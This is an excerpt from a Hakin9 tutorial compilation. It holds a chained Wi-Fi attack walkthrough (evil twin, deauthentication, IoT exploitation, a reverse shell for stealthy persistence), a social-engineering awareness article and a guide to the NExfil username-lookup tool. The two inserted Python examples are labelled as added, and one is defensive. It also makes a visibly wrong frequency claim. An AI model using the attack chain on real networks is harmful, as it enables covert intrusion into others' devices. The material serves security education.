
TEAM

Editor-in-Chief: Joanna Kretowicz, joanna.kretowicz@eforensicsmag.com
Managing Editor: Marta Sienicka, sienicka.marta@hakin9.com
Editors: Marta Strzelec (marta.strzelec@eforensicsmag.com), Bartek Adach (bartek.adach@pentestmag.com), Michalina Szpyrka (michalina.szpyrka@eforensicsmag.com)
Proofreader: Lee McKenzie
Senior Consultant/Publisher: Paweł Marciniak
CEO: Joanna Kretowicz, joanna.kretowicz@eforensicsmag.com
Marketing Director: Joanna Kretowicz, joanna.kretowicz@eforensicsmag.com
DTP: Marta Sienicka, sienicka.marta@hakin9.com
Cover Design: Hiep Nguyen Duc, Joanna Kretowicz

Betatesters & Proofreaders: Lee McKenzie, Hammad Arshed, Avi Benchimol, Amit Chugh, Kevin Goosie, Craig Thornton, Paul Mellen, Daniel W. Dieterle, Alex Giles, Filipi Pires, Matthew Sabin, Jonathan Ringler, Gregory Chrysanthou, Alexandre D’Hondt, Steve Hodge, Shanika B, David Molik, Gilles Lami, Girshel Chokhonelidze

Publisher: Hakin9 Media Sp. z o.o.
02-676 Warszawa
ul. Bielawska 6/19
Phone: 1 917 338 3631

www.hakin9.org

All trademarks, trade names, or logos mentioned or used are the property
of their respective owners. The techniques described in our articles may
only be used in private, local networks. The editors hold no responsibility
for misuse of the presented techniques or consequent data loss.
Dear readers,

We would like to present you with a special edition of Hakin9: we gathered our best 20 hacking tutorials from last year in one place. The articles are focused on different topics such as mobile hacking, attacking smart devices, phishing campaigns, Wi-Fi hacking, OSINT tools in practice and many more. Inside you will find more than 200 pages of “how-to” and “step-by-step” tutorials that will surely contribute to your development as a professional pentester or ethical hacker.

Stay safe and enjoy!

Magdalena Jarzębska and Hakin9 Editorial Team


STEALTH CHAINED WIFI ATTACKS
ROBERTO CAMERINESI
Roberto Camerinesi is a computer security researcher and developer. Embracing the philosophies of ethical hacking since adolescence, he has been working for over 11 years in the ICT and security industry. Today he is CTO of Cyber Evolution, working specifically on cyber security in IoT and industrial environments.

He believes that security should be a concept that accompanies digitization, so he spreads and studies systems to capillarize security, inventing and patenting air-gap defense systems.

Stealth Chained WiFi Attacks

“Obtain persistence without leaving traces.”

Greetings readers,

Wireless has revolutionized the way we connect, opening the way to countless fields of application.

We find it everywhere, from home networks to public hotspots, and not only there: it is used in companies supporting the BYOD (Bring Your Own Device) model and new ways of working, and today it is arriving in Industry 4.0 and sensor networks.

IoT and automotive deserve a special mention. The exponential growth of these two sectors has given a boost to wireless networks, connecting all kinds of devices, from smart TVs to automatic garage doors.

Wireless networking was born in Hawaii in 1971 with the ALOHAnet project and became an IEEE standard around 1997 with 802.11a. The frequency initially used for communication was 2.4Ghz, well above 4G, today’s cellular connections, which work at about 2.6Mhz. Over time, obviously, the 802.11 standard has evolved, with important breakthroughs such as the introduction of MIMO technology, which expands the band "physically" by using multiple antennas and multiple receivers, and support for 5Ghz (previously reserved for specific uses in specific countries).

All the implementations and improvements concerning wireless transmission are now collected under a simpler nomenclature instead of the IEEE acronyms. Today we are in fact at the Wi-Fi 6 standard and moving towards Wi-Fi 7, always with more bandwidth, optimized consumption and better latency and security.

In short, its use and continuous evolution do not stop, considering that today there are estimated to be over 500 million hotspots in the world. The density is disarming, as reported by WiGLE ( https://wigle.net/ ) for a single portion of New York:


Such an extension means a wide attack surface for a cracker.

One immediately notices how this widespread technology has led to the creation of LAN perimeters "outside the walls".

What before would have been protected, at least in physical terms, inside the perimeter now extends its reach with a wireless implementation: any wired network becomes ethereal, propagating its signal even hundreds of meters.

For this reason, different technologies are implemented to protect wireless networks, such as encryption. Initially WEP was used; it is now deprecated and has given way to the recent WPA family: WPA2, WPA2 Enterprise (with improved authentication for well-managed environments) and the still little used WPA3. Just as the scientific community has moved to raise security, the other side has moved to breach it. In fact, many attack techniques were born to violate wireless networks directly.

The most popular are password-cracking techniques: capturing the handshake (the packets that initialize a connection, similar to TCP) of an authentication and then attacking the encryption key offline.

WIFI (AND NOT ONLY) AS A STEALTH VECTOR

It is clear then that wireless protects itself in various ways using more or less powerful encryption methods, but the fact
remains that believing that wireless is impregnable can be a serious mistake.

In this case, however, we are going to analyze an attack that is a bit more complex, carried out with a different goal from the
usual "WPA crack", the goal will be to chain a Wi-Fi attack to obtain persistence in a LAN physically far away, using
the transmission power as a vector, and thus violate that network in the most stealthy and invisible way possible.

ATTACK OVERVIEW

Generally, when a cracker wants to violate a wireless network, known WLAN attacks are used, often related to cracking WEP, WPA or WPA2 keys captured over the air. In any case, it is always a "direct" attack and, as such, noisy in terms of logging and suspicious activity for whoever handles internal security. It involves activity and LOGs generated by the access point, which would report the new MAC address of the attacker's Wi-Fi NIC, alerting everybody to his presence and leaving traces.

Would there be a way to get persistent network access in a much stealthier way? The answer is virtually yes.

To remain hidden and generate no LOG related to the intrusion is always the goal of a cracker.
Fewer alarms = fewer problems when moving.

Having said that, the identified goal is to access the target network, leaving as few traces as possible and at the same time trying to obtain persistence. It seems very difficult, but it is plausible. For this, a series of chained attacks must be used, exploiting 802.11 not as a target, but as a vector.


In the heart of the attack we find a technique already known as "Rogue AP", which consists of spoofing a real Access Point
to make the target device connect to its own access point.

But remember, that the goal is persistence in the network, so we must go further, concatenating this vector to further moves
both in terms of firmware and exploiting.

Disclaimer: The PoC of attack techniques in this article is for didactical purposes and for authorized research purposes.

Breaching computer networks is a crime.

THE ATTACK CHAIN

For better understanding, the attack can be divided into several phases, below:

1. Rogue AP with high transmission power (Tx)

2. “De-auth” technique against the target IoT

3. The target IoT will connect to the Rogue AP

4. Exploiting the IoT

5. Remote Shell & Persistence


Required:

Basically, two network cards: one with an internet connection and an additional wireless network card, which also lends itself to firmware changes.

● The aircrack suite. Here is the documentation: https://www.aircrack-ng.org/doku.php?id=Main

● A Kali Linux OS is used: https://www.kali.org/

● Legend in the screenshots:

o lan1 = target network

o On the left side: the 3 macro-steps of this attack

Phase 1 - Prepare

It is necessary to initially perform a phase 1 of information gathering on the interesting wireless networks. To do this you need to put your network card in "monitor" mode, because in this way we can pick up any network and the clients connected to it, a bit like being in promiscuous mode on a wired NIC.

Generally, a monitor interface is created with a name like "wlan0mon" to identify it; to simplify, I renamed the card simply to wlan0.

Now, let's do some recon on channel 14.

In this way, we will have, for example, an output like this:

The Rogue AP method allows you to create a "fake" network on the cracker's network card by providing an arbitrary ESSID and BSSID as input for its creation.


Specifically, the technique in question is called Evil Twin. As you can see below, we can insert the cloned BSSID and ESSID by copying them manually from the data collected with airodump-ng. By doing this, our network card will create an Access Point equal in all respects to the original.

Now, with certain modifiable firmware on the antennas, you can theoretically increase the transmission power, thus matching (if not exceeding) the dB of the real access point.

The cracker, then, could increase the Tx power beyond the limits in order to be more distant from the target network.
Obviously, it is illegal to increase the signal power beyond the limits set by the law of one's own country.

Thanks to the airbase tool, at this point a virtual AP "at0" has been recreated, indistinguishable from the target ESSID network from a user's point of view.

Indeed, in terms of power, even stronger.

Now you will have to do some "bridging" with your other network card (i.e. not the one we are using for the cracking stages). I arbitrarily named the bridge "bridge", then enabled a DHCP service in order to assign an IP address to the target IoT device. All these operations can be performed in different ways; I used the "ip" suite.

The reason for bridging?

It makes sense both in terms of attack success and in terms of having more leeway for the subsequent phases (for example cloud credential sniffing), lowering the possibility of "human" detection. See the following paragraphs about phase 4, exploiting.

Enabling a DHCP daemon allows the client to obtain an address, just as if it were connected to its normal AP.


For convenience, you can play with "ready-made" tools, such as berate_ap (https://www.kali.org/tools/berate-ap/).

root@kali:~# berate_ap -h

Usage:
berate_ap [options] <wifi-interface> [<interf-with-internet>][<access-point-name>
[<passphrase>]]

Phase 2 – Doing some deauth

After performing these preliminary network operations to create the backend of the attack, the cracker proceeds with phase 2, i.e. trying to deauthenticate the target IoT from its normal connection, so that it connects to the Rogue AP with the same name created with the Evil Twin technique.

This is where the transmission power anticipated earlier comes into play: the more powerful the Rogue AP, the further away from the target you can be, and the greater the chance that the network card of the target IoT device connects to the Rogue AP.

This happens thanks to the default configuration of network card drivers or the OS which, all things being equal, obviously choose the more powerful AP to get a better connection.

To deauthenticate the hosts connected to a BSSID, forcing a reconnection, use another component of the aircrack suite, aireplay-ng, specifying the number of attempts to make and the target BSSID (in this case the BSSID of lan1):

Phase 3 – Waiting - the automatic phase

At this point, in phase 3, the target IoT will attempt to reconnect to its network, choosing however, this time the most
powerful one, namely the Rogue AP with the same name and ID.

Phase 4 – The Art of Exploit

Once the device has connected to our network, the field is open for phase 4.

It's time to try to compromise it, by exploiting popular RCE or simply trying to change the configuration of the device that
may have been left with default access credentials (admin: password), all with the precise purpose of injecting a shellcode.


This kind of credential is not uncommon; just think of the damage that the Mirai botnet has created. With this low-hanging-fruit weakness, we can upload compromised firmware, or simply modify DNS or other network parameters useful for the exploit.

The scenarios are endless, in short, with IoT devices of all kinds, from outdated (and unpatched) Linux-based camera DVRs to other networked devices, perhaps running old unpatched versions of services. At this stage, you can use the entire arsenal available for compromising devices, more or less creatively, as if you were on the LAN.

For example, for an IoT device, this is a dangerous vulnerability affecting CCTV cameras:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260

As reported there:
“A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, an attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.”

Alternatively, you can also sniff the traffic generated by the target device, with the intent of capturing possible passwords during authentication to cloud servers and the like, and exploit further command channels. Given the wide spread of wireless devices, in this article I’ve used "generic IoT" to indicate any device, but it could also be a laptop or a smartphone!

In this case, it is possible to use a very powerful browser exploitation tool like BeEF (https://beefproject.com/) or, in another case, a MITM attack. Either way, the goal in this phase remains the same: to obtain a reverse shell.

Phase 5 – The remote silent shell

Once we have obtained this shell, we arrive at step 5: we can turn off the Rogue access point, so that the target device automatically reconnects normally to its own network.

At this point, we wait for it to call back (reverse-shell approach), using, for example, a handler listening on Metasploit (https://www.metasploit.com/).

In this case, I used a generic handler, but obviously it depends on the type of payload we have loaded on the victim IoT.


COMPLETE.

Now you have control of a host in a remote network, without the AP or internal measures having detected anything. All of this because we never physically attacked the wireless network itself: it simply seems that a device went offline for a few minutes.
Inside the network, therefore, no new MAC address or IP will be noticed, since physically only the usual wireless or LAN devices are present.

In this example, we have used a target device that is IoT in the general sense, but it is possible to perform the same operations on devices such as notebooks. Obviously, the scenario changes at the point of exploitation, with advantages and disadvantages from an attacker's point of view. If it were a notebook, for example, and a user were browsing, you could force redirects or do DNS poisoning in order to exploit additional vulnerabilities or techniques, making detection complex here too, as the user would only notice a short network disconnection during the deauthentication phase.

HOW TO DEFEND FROM THESE POSSIBLE ATTACKS

It's clear that this is an articulated technique and, used properly, it becomes really dangerous. It is therefore essential to manage wireless networks very carefully, using WPA2-Enterprise encryption. In addition to encryption, it is vital to have firewall systems in the first place, so that the traffic of a compromised device towards the outside can be monitored, or better, towards IP addresses that are not appropriate or were never contacted before. In fact, IoT devices very often use the same connections, so possible anomalies can be noticed.

In support of this, IPS/IDS systems are used to verify internal movements. If the detection phase of the firewall fails, we can still notice local movements on the LAN, such as the lateral movement that a cracker performs using pivoting techniques with the compromised IoT as a vector.
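As an added example (not code from the article or its author), the script below shows the three detections a defender can run against the chain described above: an evil twin advertising an owned ESSID from an unknown BSSID or with an implausibly strong signal (phase 1), a burst of deauthentication frames against one BSSID (phase 2), and an IoT device contacting a destination it has never talked to before, the firewall check suggested in this section. All BSSIDs, addresses and frames are constructed sample data.

```python
from collections import defaultdict

# Constructed inventory of our own APs: ESSID -> {BSSID: baseline signal in dBm}.
AP_INVENTORY = {
    "lan1": {"aa:bb:cc:00:00:01": -55},
}

def detect_rogue_aps(beacons, inventory=AP_INVENTORY, margin_db=15):
    """beacons: iterable of (essid, bssid, signal_dbm) from a monitor-mode scan.
    Flags our ESSID advertised by an unknown BSSID (evil twin) and a known
    BSSID heard far above its baseline (a spoofed, high-Tx twin)."""
    alerts = []
    for essid, bssid, signal in beacons:
        known = inventory.get(essid)
        if known is None:
            continue                      # not one of our networks
        if bssid not in known:
            alerts.append(f"rogue BSSID {bssid} advertising our ESSID {essid!r}")
        elif signal > known[bssid] + margin_db:
            alerts.append(f"{bssid} ({essid!r}) heard at {signal} dBm, baseline "
                          f"{known[bssid]} dBm: possible high-Tx twin")
    return alerts

def detect_deauth_bursts(frames, threshold=10, window_s=5.0):
    """frames: iterable of (timestamp_s, subtype, bssid) management frames.
    Returns {bssid: peak count} for BSSIDs that saw more than `threshold`
    deauthentication frames inside any `window_s` window."""
    times_by_bssid = defaultdict(list)
    for ts, subtype, bssid in frames:
        if subtype == "deauth":
            times_by_bssid[bssid].append(ts)
    flagged = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):           # sliding window over timestamps
            while times[end] - times[start] > window_s:
                start += 1
            count = end - start + 1
            if count > threshold:
                flagged[bssid] = max(flagged.get(bssid, 0), count)
    return flagged

def detect_new_destinations(flows, baseline):
    """flows: iterable of (src_ip, dst_ip) from firewall/flow logs.
    baseline: {src_ip: set(dst_ip)} of destinations each IoT device normally
    contacts. Returns {src_ip: [never-seen dst_ip, ...]} in first-seen order."""
    new = defaultdict(list)
    for src, dst in flows:
        if src in baseline and dst not in baseline[src] and dst not in new[src]:
            new[src].append(dst)
    return dict(new)

# --- constructed sample data (not captures from the article's lab) ---
SAMPLE_BEACONS = [
    ("lan1", "aa:bb:cc:00:00:01", -57),    # our AP, normal
    ("guest", "11:22:33:44:55:66", -60),   # someone else's network
    ("lan1", "de:ad:be:ef:00:01", -30),    # same ESSID, unknown BSSID
    ("lan1", "aa:bb:cc:00:00:01", -20),    # our BSSID, 35 dB above baseline
]
SAMPLE_FRAMES = ([(100.0 + i * 0.1, "deauth", "aa:bb:cc:00:00:01") for i in range(12)]
                 + [(200.0, "deauth", "11:22:33:44:55:66"),
                    (230.0, "probe-req", "11:22:33:44:55:66")])
SAMPLE_FLOWS = [
    ("192.0.2.50", "198.51.100.10"),   # camera -> its usual cloud endpoint
    ("192.0.2.50", "203.0.113.77"),    # camera -> never-seen host (callback?)
    ("192.0.2.50", "203.0.113.77"),
    ("192.0.2.99", "203.0.113.77"),    # device with no baseline: ignored
]
BASELINE = {"192.0.2.50": {"198.51.100.10"}}

if __name__ == "__main__":
    for a in detect_rogue_aps(SAMPLE_BEACONS):
        print("ALERT:", a)
    print("deauth bursts:", detect_deauth_bursts(SAMPLE_FRAMES))
    print("new destinations:", detect_new_destinations(SAMPLE_FLOWS, BASELINE))
```

The baseline signal margin and deauth threshold are tuning knobs: set them from a few days of normal captures so that roaming clients and ordinary reconnects do not trip them.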

HOW SOCIAL NETWORKS ARE DIRECTLY CONNECTED WITH THE IMPROPER APPLICATION OF SOCIAL ENGINEERING
FELIPE HIFRAM
He is currently an information security professional focused on habits of good use and privacy on the Internet. He has done work for companies in Brazil, Ukraine, Oman and Bahrain, in addition to writing several other articles.

How Social Networks Are Directly Connected With The Improper Application of
Social Engineering

"Privacy for the weak, transparency for the powerful!"

(Julian Assange)

SOCIAL ENGINEERING, A BRIEF INTRODUCTION

At some point in your life, when checking your emails, you have come across "your bank" asking you to reset your account password, or perhaps a raffle result in which you were the winner…

These and similar cases are already well known (although they still work); what really matters here is the root of this type of attack: the purpose of inducing people to provide data and information. It is an attack that affects ordinary people and even large corporations.

Social Engineering is defined as attacks that dispense with the use of technology, focusing only on obtaining valuable, usually commercial, information by taking advantage of a company's lack of security policies.

SOCIAL NETWORKS, A DOOR TO SCAMS

Imagine yourself as a developer for a large technology company, you are currently working on a new project that promises
to revolutionize your company's niche.

On a Friday, after work, you decide to go to a bar for a cold beer and rest from the busy week, until you are interrupted by someone who claims to have recognized you through Facebook or Instagram and who describes your job as “incredible”. You automatically, like most people, find this interesting (after all, it's a compliment) and allow that person to come closer.

"Today, with social networks, people tend to be more easily manipulated through a common weakness: vanity."

Returning to your character... The person you have just met presents himself as a professional in his area, demonstrating in-depth knowledge in support of what he says, and here you have already established a bond by professional affinity.
"Usually, social engineers, who are very good at manipulation, can guide the conversation to get the information they are looking for, making it seem natural."

As a result of the manipulator's skill, you want to impress him even more and show him how amazing you and your work are. Then comes the moment when the attacker asks, in a harmless tone: "So, what are you working on at the moment?"

At this point, by revealing details of the project you're working on, you put the company you work for at risk, revealing business information that can now easily be sold to competing companies, which could result in financial losses for yours.

To give an example of the consequences and facilitate understanding of the problem, I will create an assumption:

Today Apple has its Chip M1 [an entire system, in addition to just processing, is included in it], currently used in its
MacBook; the launch of this technology revolutionized the market, making its products much more attractive.

Now imagine if Apple had not invested in security policies for employees and one of them had naively gone through a
situation similar to the one described here, revealing details of the development of the Chip M1. This information could be
sold to the competition, resulting in a totally different scenario than we know today. Apple would not have revolutionized
the market, a competing company would have developed and launched its own chip before it, causing Apple to lose space
and the title of pioneer in this technology.

ARE ALL POTENTIAL TARGETS?

It is usually to be expected that people who hold important positions will be targeted by malicious social engineers more often, but nowadays we even have cases of botnets responsible for sending tens of thousands of phishing emails, for the purpose of stealing personal data, and even if the email is not the best, victims always fall for it, yielding data that may be sold or used to carry out other crimes in the future.

With social networks it is also much easier to identify the target. People usually post their entire personal lives on their networks and, even worse, they do not control who can access this information: a public profile in which intimate details of someone's life are stored. It's a full plate for criminals.

In your Instagram feed we can find out where you go to have fun or where you travel on vacation, in the stories we can learn
what time you work, study, what you do on a daily basis and, in some cases, even your emotional problems;

On Facebook, we can determine when you are out and where you are, we can know what pages you like, what kind of music
you like, your religion, age, who you relate to, your sexual choice, your hobbies, who you are friends with;

On LinkedIn we can know where you work, map the hierarchical structure of your business, find out what position you
occupy, discover your co-workers.

So yes, we are all potential targets, whether to steal data or information, with classic social engineering (phishing email or a very attractive promotion) or, as in the case described in this article, where a malicious professional will personally deliver the blow.

PROBLEM IN NUMBERS

To prove what is written in this article, I will mention some research and statistical data that prove the degree of
dangerousness of Social Engineering:

In 2018, a survey by Verizon (an American phone company) found 41,686 cases of security problems in that year alone,
and 33% were social engineering attacks.

Fake accounts can also serve as a means for attackers to communicate with their victims, and according to a 2016 report
published by Facebook, we have about 31 million fake accounts, as a percentage of 2% of monthly users of the social
network.


The security company Kaspersky Lab decided to conduct a questionnaire with internet users and found that 30% of social network users share personal information, locations and posts with unknown people.

Meanwhile, a report from the company Positive Technologies showed the percentage of successful social engineering attacks. They sent about 3,300 emails to employees of various companies and came up with the following result:

17% of all emails were successful, which could lead, for example, to the compromise of an entire company's infrastructure.

27% of the targets clicked on a link sent via phishing email, showing ignorance about security and proving a potential vulnerability.

It is also important to note that Social Engineering does not have a standard way of being applied: it can even be delivered through malware, worms, the network, fax, phone calls, SMS, URLs, baiting, cyberattacks such as DNS spoofing and, of course, the most common, phishing email. What do most of these attacks have in common? They all exploit the emotional side of people; for hackers of the mind, social engineering is an art.

HOW TO PROTECT YOURSELF

To begin, I will quote a list of habits that all users, whether they use social networks or not, must have to reduce their vulnerability on the internet:

● Never click links coming from emails or SMS that you didn't expect.

● Use secure passwords that are unrelated to your intimate life, such as dates of birth, family names, your favorite movie, music, series, singer or book: nothing that has the potential to be discovered by anyone who searches for you and your tastes.

● It is important to maintain 2-factor protection on all your accounts where this is possible; this ensures an extra layer of protection through an SMS, PIN or fingerprint.

● Never share information about your day-to-day life over the internet, especially the names of places you usually frequent and your location. This can help criminals create more compelling contexts to deceive you.

● Be cautious when meeting people, whether in person or on the internet; never say face-to-face everything about you, your work, family, college and any other privileged information that can be used against you in social engineering attacks.

● Be suspicious, even if only minimally; it is enough to avoid headaches (with phishing).

● Never share your Wi-Fi network with people you've met recently.

● To add to the previous tip, it's also a good idea not to use public Wi-Fi networks, and if you have to, turn on a VPN while browsing.

● Security is not just about mobiles and computers; ensure that other devices such as printers and routers are up to date with their systems and properly configured.

● Keep all your software up to date. Updates usually contain important fixes that aim to ensure better security for users.

● Be cautious when downloading pirated content from the internet (the recommendation is not to download it).

● Review who has access to your social media posts, and preferably make your profile private.

● Prevent streaming apps from showing what you watch or listen to.

Now, talking a little more about ways to protect yourself but focusing on attacks on your psychology (mind hacking): in addition to good account management and attention to emails and SMS, you should rethink your communication habits, online (especially) but also in person.

Speaking a little for myself, I discovered my potential as a social engineer well before I learned to work with computers and
people security, since I was younger I had the potential, for example: to guide a conversation and make the person tell me
what I wanted to discover, or practice so-called reverse social engineering, when you don't approach the person, but open
the way for them to reach you. When I was younger I thought it was just "talking well" and I used this to win over some
girls, hahaha. After a few years of professional study of the application of social engineering, I discovered that people are
naturally vulnerable and that in order for companies to have the chance to keep their projects confidential, they need to go
beyond privacy clauses, it is necessary to implement a privacy policy, provide training to all employees and periodically test
them by hiring specialized pen-testers.

BIBLIOGRAPHY:

1. https://www.avira.com/pt-br/blog/dia-mundial-das-redes-sociais-o-que-voce-deve-saber-sobre-engenharia-social

2. https://www.passeidireto.com/arquivo/37524509/engenharia-social-nas-redes-sociais-phishing-na-pratica

3. https://www.kaspersky.com/resource-center/definitions/what-is-social-engineering

LIGHTNING FAST PROFILE LOOKUPS USING NEXFIL
LOHITYA PUSHKAR (THEWHITEH4T)
Security Assessment Engineer and Community lead at The White Circle. I have created multiple open source tools for the infosec community. You can find my projects on GitHub. Please give them a star if you like my work. I am currently learning and practicing Red Teaming, Network Penetration Testing and OSINT.

Blog : https://thewhiteh4t.github.io

GitHub : https://github.com/thewhiteh4t

Twitter : https://twitter.com/thewhiteh4t

LinkedIn : https://www.linkedin.com/in/lohityapushkar

Discord : https://discord.gg/UM92zUn

Lightning Fast Profile Lookups Using NExfil

In this day and age, the internet is widely populated with social media platforms. Some are well known and used by the
majority of the people; meanwhile, some have lost interest of people as they move to newer platforms, and there are new
platforms being launched every year. During OSINT investigations, usernames are like seeds from which new branches
open up in an investigation and we can get loads of information. All these platforms help in their own way, each platform is
capable of displaying something that might help an investigator. Some show joining dates while others can reveal birthdays.
We can check five or ten websites manually but after a certain point it becomes repetitive and exhaustive. I believe that
OSINT investigations are best done manually but I also believe that tools can give us an edge. Tools can automate the
workflow and greatly reduce the time of certain tasks such as user profile lookups on a given username. If you have
performed profile lookups before then I am sure you will be aware of some existing tools for the same. Some honorable
mentions are instantusername.com and sherlock. Profile lookup tools are available on both websites as well as command
line tools. I personally prefer and recommend command line tools due to the fact that they offer more control over the tool.

WHAT IS NEXFIL?

NExfil is a new free and open source profile lookup tool written in Python. The goal of NExfil is to fetch accurate results
quickly, which means low amounts of false positives in a short amount of time. It comes loaded with over 350 social media
platforms, which can be expanded. Most of the popular social media platforms have been added and tested for accurate
results. The nature of the tool is modular so it is very simple to add new modules or new websites to the pool for going
beyond the current count.

WHY I CREATED NEXFIL

I play a lot of capture the flag competitions to practice my cyber security skills and to gain more knowledge. Fortunately,
new CTF competitions are acknowledging OSINT and have started including it as a category of its own. This is great
because now we can practice our OSINT skills as well, and so far in each competition, I found myself using some sort of
profile lookup tool, mostly the ones I mentioned before, i.e. instantusername.com and sherlock. If you have been using
them then you know there are certain issues with both. Let's talk about instantusername first. It sticks to its name and it is
very fast, which is great, but it has support for about 100 social media platforms, which is decent, but then comes the major
issue of false positives. CTFs have a time limitation and the way the challenges are created, we end up finding a needle in a
haystack. False positives really pull us back from reaching the goal because it increases the time and effort we put into
checking the results. Eventually, I switched over to sherlock. One major benefit of command line tools is that the tools are
immediately accessible, you don't need to open some GUI application or browse to some website, which is why I prefer
most of my tools in command line mode instead of a graphical user interface. Sherlock is a very popular tool but it has its
own set of issues. It is actually slow, which is again not what we want and it has the same major flaw like
instantusername.com, it has lots of false positives and it does not depend on the username you input, you can input any
random non existent username and it will show you results, which obviously do not exist.


So it took about 2 minutes and 16 seconds to show 8 false positive results. The results are similar if I use a valid username.

So as you can see, some valid results along with false positives in 2 minutes 18 seconds.

Now let’s see NExfil in action.

As you can see above, I got accurate results, i.e. 0 results, since the username I entered was completely random and
non-existent, and in just 16 seconds, 351 URLs were processed. Now let us check a valid username.

Twenty profiles were found by NExfil and all are correct, that means zero false positives and if you look at the time taken,
it's just eight seconds.

FEATURES

NExfil is still in its early stages of development but completely usable. The current feature set is small but I am working on
new features and they will be added soon.

Speed: as you can see in the demonstration above, NExfil is capable of completing the lookup within 20 seconds;
there is a command line option for increasing or decreasing this duration depending on your network connection

Over 350 social media platforms are supported. Feel free to add more to the list to increase the pool even further

Batch processing

Multiple usernames can be provided by a comma separated list

Multiple usernames can be provided from a file which contains a username list, i.e. one username per line

Results are automatically saved in a TXT file and the path is displayed to the user for easy access. The formatting
of the TXT file is simple so it can be easily parsed by the user if required

FEATURES IN DEVELOPMENT

Two important features are in development right now:

More file formats for output such as JSON and CSV. Currently, the tool only outputs TXT but soon users will have
the option for other formats.

Proxy and TOR support. Maintaining anonymity and sock puppets during an investigation is crucial, which
is why this is one of the most important features I am working on currently; it will be available soon.

HOW IT WORKS

NExfil makes use of concurrency to achieve the speed you just witnessed above. I have tested all of the included
websites and created certain test cases. These test cases are an important part of the tool because they are responsible for
keeping false positives low or at zero. Each website is built differently and behaves differently; one test case does not work
for all websites, so while I was writing the tool I created a set of test cases that cover most websites. There is a good
chance that if you add a new website, one of the existing test cases will be enough to verify results and filter out false
positives. Some websites send a 404 status code, so they are easy to process and consistently accurate. Meanwhile, some
websites send a 200 OK status code even if a profile does not exist. In this case, NExfil looks for an error message string
such as “Profile not found” in the page to verify whether the profile actually exists. Similarly, there are other test cases
for different situations that help maintain accuracy. Here is an example for Archive.org:
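The test-case approach described above (a site whose missing profiles return 404 versus a site that returns 200 OK with an error string, both probed concurrently under a timeout), as an added Python example written for this article and not taken from NExfil's source. The site names, URLs and the fake fetcher are constructed stand-ins for the real network; a site that does not answer in time is reported as unverified rather than counted as a hit.

```python
import asyncio
from dataclasses import dataclass, field
from typing import Awaitable, Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Site:
    """One website in the pool plus the test case used to verify a hit."""
    name: str
    url_template: str             # "{}" is replaced by the username
    test: str                     # "status": 404 means missing; "error_string": inspect the body
    error_string: Optional[str] = None


# Constructed site definitions for this demo (assumed names and URLs, not
# entries from NExfil's real list). ExampleSlow never answers, to show the
# timeout path.
SITES: List[Site] = [
    Site("ExampleStatus", "https://status.example/{}", "status"),
    Site("ExampleSoft404", "https://soft404.example/u/{}", "error_string", "Profile not found"),
    Site("ExampleSlow", "https://slow.example/{}", "status"),
]


def classify(site: Site, status: int, body: str) -> bool:
    """Apply the site's test case to a response; True only for a verified profile."""
    if site.test == "status":
        return status == 200
    if site.test == "error_string":
        # The site answers 200 even for missing users, so the body decides.
        return status == 200 and site.error_string not in body
    raise ValueError(f"unknown test case {site.test!r}")


@dataclass
class LookupResult:
    found: Dict[str, str] = field(default_factory=dict)   # site name -> profile URL
    unverified: List[str] = field(default_factory=list)   # timed out or errored


Fetcher = Callable[[Site, str], Awaitable[Tuple[int, str]]]


async def lookup(username: str, sites: List[Site], fetch: Fetcher,
                 timeout: float = 20.0, concurrency: int = 50) -> LookupResult:
    """Probe every site concurrently. A site that does not answer within
    `timeout` is reported as unverified, never counted as a hit."""
    result = LookupResult()
    gate = asyncio.Semaphore(concurrency)

    async def probe(site: Site) -> None:
        url = site.url_template.format(username)
        async with gate:
            try:
                status, body = await asyncio.wait_for(fetch(site, url), timeout)
            except (asyncio.TimeoutError, OSError):
                result.unverified.append(site.name)
                return
        if classify(site, status, body):
            result.found[site.name] = url

    await asyncio.gather(*(probe(s) for s in sites))
    return result


# Constructed fake backend standing in for the network: which usernames
# "exist" on each fake site (names taken from the users.txt example above).
FAKE_PROFILES = {
    "ExampleStatus": {"adam", "jensen"},
    "ExampleSoft404": {"jensen"},
    "ExampleSlow": {"adam"},
}


async def fake_fetch(site: Site, url: str) -> Tuple[int, str]:
    """Simulate each site's behaviour instead of making a real request."""
    if site.name == "ExampleSlow":
        await asyncio.sleep(3600)          # never answers in time
    username = url.rsplit("/", 1)[-1]
    exists = username in FAKE_PROFILES[site.name]
    if site.test == "status":
        return (200, "<html>profile page</html>") if exists else (404, "")
    # Soft-404 site: always 200, error string in the body when missing.
    if exists:
        return 200, "<html>profile page</html>"
    return 200, "<html>Profile not found</html>"


def run_lookup(username: str, timeout: float = 20.0) -> LookupResult:
    """Synchronous entry point using the constructed sites and fake backend."""
    return asyncio.run(lookup(username, SITES, fake_fetch, timeout=timeout))


if __name__ == "__main__":
    for name in ("jensen", "zzq9notarealuser"):
        r = run_lookup(name, timeout=0.5)
        print(f"{name}: found={r.found} unverified={r.unverified}")
```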

INSTALLATION

NExfil is created for Linux and requires Python 3.9. Please make sure you have Python 3.9 and pip ready and working
before proceeding. The other dependencies are quick and easy to install. Here are the steps to install it on your machine:

$ git clone https://github.com/thewhiteh4t/nexfil.git
$ cd nexfil
$ pip3 install -r requirements.txt

USAGE

$ python3 nexfil.py -h
usage: nexfil.py [-h] [-u U] [-d D [D ...]] [-f F] [-l L]
[-t T] [-v]

nexfil - Find social media profiles on the web | v1.0.0

optional arguments:
-h, --help show this help message and exit
-u U Specify username
-d D [D ...] Specify DNS Servers [Default : 1.1.1.1]
-f F Specify a file containing username list
-l L Specify multiple comma separated usernames
-t T Specify timeout [Default : 20]
-v Prints version

Whenever in doubt consult the help menu. You can check the current installed version as well as other options to fine tune
the tool. More options, such as output formats and proxy settings, will appear here in the future.

Here are some example commands to get you started:

Perform a single username lookup:

$ python3 nexfil.py -u username

Multiple *comma* separated usernames for batch lookup:

$ python3 nexfil.py -l "user1, user2, user3, user4"

Multiple usernames from a file for batch lookup:

$ python3 nexfil.py -f users.txt

The contents of the file should be in a fixed format of one username per line. This is the standard format for all wordlists.
For example:

$ cat users.txt
adam
jensen
thewhiteh4t
john43

If the username file is in some other directory then you must provide the absolute path to the file like this:

$ python3 nexfil.py -f /home/your_username/Downloads/user_list.txt

You can also use custom DNS servers to resolve the queries; by default, Cloudflare DNS is used. Here is how you can specify
your own:

